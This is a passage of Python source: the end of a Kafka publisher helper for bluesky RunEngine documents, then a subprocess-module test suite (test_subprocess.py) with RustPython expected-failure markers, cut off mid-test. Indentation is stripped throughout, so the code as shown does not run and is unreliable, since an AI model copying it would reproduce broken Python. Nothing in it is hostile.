f"topic `{beamline_runengine_topic}` does not exist on Kafka broker(s) `{bootstrap_servers}`",
)
except BaseException:
"""
An exception at this point means bluesky documents
will not be published as Kafka messages.
"""
nslsii_logger.exception(
"RunEngine is not able to publish bluesky documents as Kafka messages on topic '%s'",
beamline_runengine_topic
)
return beamline_runengine_topic, publisher_thread_stop_event, kafka_publisher_token
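# Illustrative sketch only (not part of the original module): a plausible call
# into _build_and_subscribe_kafka_publisher. The broker addresses and producer
# settings below are placeholders; real deployments supply site-specific values.
def _example_build_kafka_publisher(RE):
    topic, stop_event, token = _build_and_subscribe_kafka_publisher(
        RE=RE,
        beamline_name="csx",
        bootstrap_servers="kafka1:9092,kafka2:9092",
        producer_config={"acks": "all", "enable.idempotence": True},
    )
    return topic, stop_event, token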
test_subprocess.py
import unittest
from unittest import mock
from test import support
import subprocess
import sys
import signal
import io
import itertools
import os
import errno
import tempfile
import time
import traceback
import selectors
import sysconfig
import select
import shutil
import threading
import gc
import textwrap
from test.support import FakePath
try:
import _testcapi
except ImportError:
_testcapi = None
if support.PGO:
raise unittest.SkipTest("test is not helpful for PGO")
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
if mswindows:
SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
'os.O_BINARY);')
else:
SETBINARY = ''
NONEXISTING_CMD = ('nonexisting_i_hope',)
# Ignore errors that indicate the command was not found
NONEXISTING_ERRORS = (FileNotFoundError, NotADirectoryError, PermissionError)
ZERO_RETURN_CMD = (sys.executable, '-c', 'pass')
def setUpModule():
shell_true = shutil.which('true')
if shell_true is None:
return
if (os.access(shell_true, os.X_OK) and
subprocess.run([shell_true]).returncode == 0):
global ZERO_RETURN_CMD
ZERO_RETURN_CMD = (shell_true,) # Faster than Python startup.
class BaseTestCase(unittest.TestCase):
def setUp(self):
# Try to minimize the number of children we have so this test
# doesn't crash on some buildbots (Alphas in particular).
support.reap_children()
def tearDown(self):
if not mswindows:
# subprocess._active is not used on Windows and is set to None.
for inst in subprocess._active:
inst.wait()
subprocess._cleanup()
self.assertFalse(
subprocess._active, "subprocess._active not empty"
)
self.doCleanups()
support.reap_children()
def assertStderrEqual(self, stderr, expected, msg=None):
# In a debug build, stuff like "[6580 refs]" is printed to stderr at
# shutdown time. That frustrates tests trying to check stderr produced
# from a spawned Python process.
actual = support.strip_python_stderr(stderr)
# strip_python_stderr also strips whitespace, so we do too.
expected = expected.strip()
self.assertEqual(actual, expected, msg)
class PopenTestException(Exception):
pass
class PopenExecuteChildRaises(subprocess.Popen):
"""Popen subclass for testing cleanup of subprocess.PIPE filehandles when
_execute_child fails.
"""
def _execute_child(self, *args, **kwargs):
raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_io_buffered_by_default(self):
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
self.assertIsInstance(p.stdin, io.BufferedIOBase)
self.assertIsInstance(p.stdout, io.BufferedIOBase)
self.assertIsInstance(p.stderr, io.BufferedIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_io_unbuffered_works(self):
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=0)
try:
self.assertIsInstance(p.stdin, io.RawIOBase)
self.assertIsInstance(p.stdout, io.RawIOBase)
self.assertIsInstance(p.stderr, io.RawIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_call_timeout(self):
# call() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.call waits for the
# child.
self.assertRaises(subprocess.TimeoutExpired, subprocess.call,
[sys.executable, "-c", "while True: pass"],
timeout=0.1)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call(ZERO_RETURN_CMD)
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print('BDFL')"])
self.assertIn(b'BDFL', output)
def test_check_output_nonzero(self):
# check_output() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn(b'BDFL', output)
def test_check_output_stdin_arg(self):
# check_output() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
stdin=tf)
self.assertIn(b'PEAR', output)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
input=b'pear')
self.assertIn(b'PEAR', output)
def test_check_output_input_none(self):
"""input=None has a legacy meaning of input='' on check_output."""
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; print('XX' if sys.stdin.read() else '')"],
input=None)
self.assertNotIn(b'XX', output)
def test_check_output_input_none_text(self):
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; print('XX' if sys.stdin.read() else '')"],
input=None, text=True)
self.assertNotIn('XX', output)
# TODO: RUSTPYTHON
if sys.platform != "win32":
test_check_output_input_none_text = unittest.expectedFailure(test_check_output_input_none_text)
def test_check_output_input_none_universal_newlines(self):
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; print('XX' if sys.stdin.read() else '')"],
input=None, universal_newlines=True)
self.assertNotIn('XX', output)
def test_check_output_stdout_arg(self):
# check_output() refuses to accept 'stdout' argument
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_check_output_stdin_with_input_arg(self):
# check_output() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdin=tf, input=b'hare')
self.fail("Expected ValueError when stdin and input args supplied.")
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
# check_output() function with timeout arg
with self.assertRaises(subprocess.TimeoutExpired) as c:
output = subprocess.check_output(
[sys.executable, "-c",
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"],
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3)
self.fail("Expected TimeoutExpired.")
self.assertEqual(c.exception.output, b'BDFL')
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def _assert_python(self, pre_args, **kwargs):
# We include sys.exit() to prevent the test runner from hanging
# whenever python is found.
args = pre_args + ["import sys; sys.exit(47)"]
p = subprocess.Popen(args, **kwargs)
p.wait()
self.assertEqual(47, p.returncode)
def test_executable(self):
# Check that the executable argument works.
#
# On Unix (non-Mac and non-Windows), Python looks at args[0] to
# determine where its standard library is, so we need the directory
# of args[0] to be valid for the Popen() call to Python to succeed.
# See also issue #16170 and issue #7774.
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"], executable=sys.executable)
def test_bytes_executable(self):
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"],
executable=os.fsencode(sys.executable))
def test_pathlike_executable(self):
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"],
executable=FakePath(sys.executable))
def test_executable_takes_precedence(self):
# Check that the executable argument takes precedence over args[0].
#
# Verify first that the call succeeds without the executable arg.
pre_args = [sys.executable, "-c"]
self._assert_python(pre_args)
self.assertRaises(NONEXISTING_ERRORS,
self._assert_python, pre_args,
executable=NONEXISTING_CMD[0])
# TODO: RUSTPYTHON
if sys.platform != "win32":
test_executable_takes_precedence = unittest.expectedFailure(test_executable_takes_precedence)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_executable_replaces_shell(self):
# Check that the executable argument replaces the default shell
# when shell=True.
self._assert_python([], executable=sys.executable, shell=True)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_bytes_executable_replaces_shell(self):
self._assert_python([], executable=os.fsencode(sys.executable),
shell=True)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_pathlike_executable_replaces_shell(self):
self._assert_python([], executable=FakePath(sys.executable),
shell=True)
# For use in the test_cwd* tests below.
def _normalize_cwd(self, cwd):
# Normalize an expected cwd (for Tru64 support).
# We can't use os.path.realpath since it doesn't expand Tru64 {memb}
# strings. See bug #1063571.
with support.change_cwd(cwd):
return os.getcwd()
# For use in the test_cwd* tests below.
def _split_python_path(self):
# Return normalized (python_dir, python_base).
python_path = os.path.realpath(sys.executable)
return os.path.split(python_path)
# For use in the test_cwd* tests below.
def _assert_cwd(self, expected_cwd, python_arg, **kwargs):
# Invoke Python via Popen, and assert that (1) the call succeeds,
# and that (2) the current working directory of the child process
# matches *expected_cwd*.
p = subprocess.Popen([python_arg, "-c",
"import os, sys; "
"buf = sys.stdout.buffer; "
"buf.write(os.getcwd().encode()); "
"buf.flush(); "
"sys.exit(47)"],
stdout=subprocess.PIPE,
**kwargs)
self.addCleanup(p.stdout.close)
p.wait()
self.assertEqual(47, p.returncode)
normcase = os.path.normcase
self.assertEqual(normcase(expected_cwd),
normcase(p.stdout.read().decode()))
def test_cwd(self):
# Check that cwd changes the cwd for the child process.
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=temp_dir)
def test_cwd_with_bytes(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=os.fsencode(temp_dir))
def test_cwd_with_pathlike(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=FakePath(temp_dir))
# TODO: RUSTPYTHON
@unittest.expectedFailure
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_arg(self):
# Check that Popen looks for args[0] relative to cwd if args[0]
# is relative.
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python])
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, rel_python, cwd=python_dir)
# TODO: RUSTPYTHON
@unittest.expectedFailure
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_executable(self):
# Check that Popen looks for executable relative to cwd if executable
# is relative (and that executable takes precedence over args[0]).
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
doesntexist = "somethingyoudonthave"
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python)
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python,
cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, doesntexist, executable=rel_python,
cwd=python_dir)
def test_cwd_with_absolute_arg(self):
# Check that Popen can find the executable when the cwd is wrong
# if args[0] is an absolute path.
python_dir, python_base = self._split_python_path()
abs_python = os.path.join(python_dir, python_base)
rel_python = os.path.join(os.curdir, python_base)
with support.temp_dir() as wrong_dir:
# Before calling with an absolute path, confirm that using a
# relative path fails.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
wrong_dir = self._normalize_cwd(wrong_dir)
self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir)
# TODO: RUSTPYTHON
if sys.platform != "win32":
test_cwd_with_absolute_arg = unittest.expectedFailure(test_cwd_with_absolute_arg)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable_with_cwd(self):
python_dir, python_base = self._split_python_path()
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, "somethingyoudonthave",
executable=sys.executable, cwd=python_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
self._assert_cwd(os.getcwd(), "somethingyoudonthave",
executable=sys.executable)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write(b"pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
os.write(d, b"pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b"pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read(), b"orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
with p:
self.assertStderrEqual(p.stderr.read(), b"strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertStderrEqual(os.read(d, 1024), b"strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"strawberry")
def test_stderr_redirect_with_no_stdout_redirect(self):
# test stderr=STDOUT while stdout=None (not set)
# - grandchild prints to stderr
# - child redirects grandchild's stderr to its stdout
# - the parent should get grandchild's stderr in child's stdout
p = subprocess.Popen([sys.executable, "-c",
'import sys, subprocess;'
'rc = subprocess.call([sys.executable, "-c",'
' "import sys;"'
' "sys.stderr.write(\'42\')"],'
' stderr=subprocess.STDOUT);'
'sys.exit(rc)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
#NOTE: stdout should get stderr from grandchild
self.assertStderrEqual(stdout, b'42')
self.assertStderrEqual(stderr, b'') # should be empty
self.assertEqual(p.returncode, 0)
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
with p:
self.assertStderrEqual(p.stdout.read(), b"appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'b\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test with stdout=1')
@unittest.skipIf(sys.platform != "win32", "TODO: RUSTPYTHON, takes a long time")
def test_stdout_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'for i in range(10240):'
'print("x" * 1024)'],
stdout=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdout, None)
@unittest.skipIf(sys.platform != "win32", "TODO: RUSTPYTHON, takes a long time")
def test_stderr_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys\n'
'for i in range(10240):'
'sys.stderr.write("x" * 1024)'],
stderr=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stderr, None)
def test_stdin_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdin.read(1)'],
stdin=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdin, None)
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
with subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange")
# TODO: RUSTPYTHON
@unittest.expectedFailure
# Windows requires at least the SYSTEMROOT environment variable to start
# Python
@unittest.skipIf(sys.platform == 'win32',
'cannot test an empty env on Windows')
@unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') == 1,
'The Python shared library cannot be loaded '
'with an empty environment.')
def test_empty_env(self):
"""Verify that env={} is as empty as possible."""
def is_env_var_to_ignore(n):
"""Determine if an environment variable is under our control."""
# This excludes some __CF_* and VERSIONER_* keys MacOS insists
# on adding even when the environment in exec is empty.
# Gentoo sandboxes also force LD_PRELOAD and SANDBOX_* to exist.
return ('VERSIONER' in n or '__CF' in n or # MacOS
n == 'LD_PRELOAD' or n.startswith('SANDBOX') or # Gentoo
n == 'LC_CTYPE') # Locale coercion triggered
with subprocess.Popen([sys.executable, "-c",
'import os; print(list(os.environ.keys()))'],
stdout=subprocess.PIPE, env={}) as p:
stdout, stderr = p.communicate()
child_env_names = eval(stdout.strip())
self.assertIsInstance(child_env_names, list)
child_env_names = [k for k in child_env_names
if not is_env_var_to_ignore(k)]
self.assertEqual(child_env_names, [])
def test_invalid_cmd(self):
# null character in the command name
cmd = sys.executable + '\0'
with self.assertRaises(ValueError):
subprocess.Popen([cmd, "-c", "pass"])
# null character in the command argument
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass#\0"])
def test_invalid_env(self):
# null character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT\0VEGETABLE"] = "cabbage"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# null character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange\0VEGETABLE=cabbage"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# equal character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT=ORANGE"] = "lemon"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# equal character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange=lemon"
with subprocess.Popen([sys.executable, "-c",
'import sys, os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange=lemon")
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate(b"pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, b"pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertStderrEqual(stderr, b"pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate(b"banana")
self.assertEqual(stdout, b"banana")
self.assertStderrEqual(stderr, b"pineapple")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_communicate_timeout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stderr.write("pineapple\\n");'
'time.sleep(1);'
'sys.stderr.write("pear\\n");'
'sys.stdout.write(sys.stdin.read())'],
universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana",
timeout=0.3)
# Make sure we can keep waiting for it, and that we get the whole output
# after it completes.
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "banana")
self.assertStderrEqual(stderr.encode(), b"pineapple\npear\n")
def test_communicate_timeout_large_output(self):
# Test an expiring timeout while the child is outputting lots of data.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'],
stdout=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4)
(stdout, _) = p.communicate()
self.assertEqual(len(stdout), 4 * 64 * 1024)
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
for stdin_pipe in (False, True):
for stdout_pipe in (False, True):
for stderr_pipe in (False, True):
options = {}
if stdin_pipe:
options['stdin'] = subprocess.PIPE
if stdout_pipe:
options['stdout'] = subprocess.PIPE
if stderr_pipe:
options['stderr'] = subprocess.PIPE
if not options:
continue
p = subprocess.Popen(ZERO_RETURN_CMD, **options)
p.communicate()
if p.stdin is not None:
self.assertTrue(p.stdin.closed)
if p.stdout is not None:
self.assertTrue(p.stdout.closed)
if p.stderr is not None:
self.assertTrue(p.stderr.closed)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
@unittest.skipIf(sys.platform != "win32", "TODO: RUSTPYTHON, hangs")
def test_communicate_pipe_buf(self):
# communicate() with writes larger than pipe_buf
# This test will probably deadlock rather than fail, if
# communicate() does not work properly.
x, y = os.pipe()
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("x" * %d);'
'sys.stdout.write(sys.stdin.read())' %
support.PIPE_MAX_SIZE],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = b"a" * support.PIPE_MAX_SIZE
(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
# TODO: RUSTPYTHON
if sys.platform == "win32":
test_communicate_pipe_buf = unittest.expectedFailure(test_communicate_pipe_buf)
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write(b"banana")
(stdout, stderr) = p.communicate(b"split")
self.assertEqual(stdout, b"bananasplit")
self.assertStderrEqual(stderr, b"")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_universal_newlines_and_text(self):
args = [
sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(sys.stdin.readline().encode());'
'buf.flush();'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(sys.stdin.read().encode());'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");']
for extra_kwarg in ('universal_newlines', 'text'):
p = subprocess.Popen(args, **{'stdin': subprocess.PIPE,
'stdout': subprocess.PIPE,
extra_kwarg: True})
with p:
p.stdin.write("line1\n")
p.stdin.flush()
self.assertEqual(p.stdout.readline(), "line1\n")
p.stdin.write("line3\n")
p.stdin.close()
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.readline(),
"line2\n")
self.assertEqual(p.stdout.read(6),
"line3\n")
self.assertEqual(p.stdout.read(),
"line4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate(self):
# universal newlines through communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
